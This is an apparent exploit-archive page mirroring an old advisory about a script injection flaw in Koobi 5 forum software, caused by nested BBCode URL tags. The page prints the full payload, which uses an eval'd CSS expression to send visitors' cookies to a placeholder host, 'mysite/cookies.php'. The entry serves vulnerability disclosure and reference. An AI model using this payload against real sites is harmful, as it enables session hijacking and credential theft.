Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Script Injection Vulnerability in Koobi - exploit.company
header-logo
Suggest Exploit
vendor:
Koobi
by:
7.5
CVSS
HIGH
Script Injection
CWE
Product Name: Koobi
Affected Version From: Koobi 5
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Script Injection Vulnerability in Koobi

An attacker can nest BBCode URL tags to trigger this issue and execute arbitrary code in a user's browser. Attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. Other attacks are also possible.

Mitigation:

No official mitigation is mentioned.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16078/info

Koobi is prone to a script injection vulnerability.

An attacker can nest BBCode URL tags to trigger this issue and execute arbitrary code in a user's browser.

Attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. Other attacks are also possible.

Koobi 5 is reportedly prone to this vulnerability. 

[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?
c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

Navigation

Suggest Exploit

Services By CQR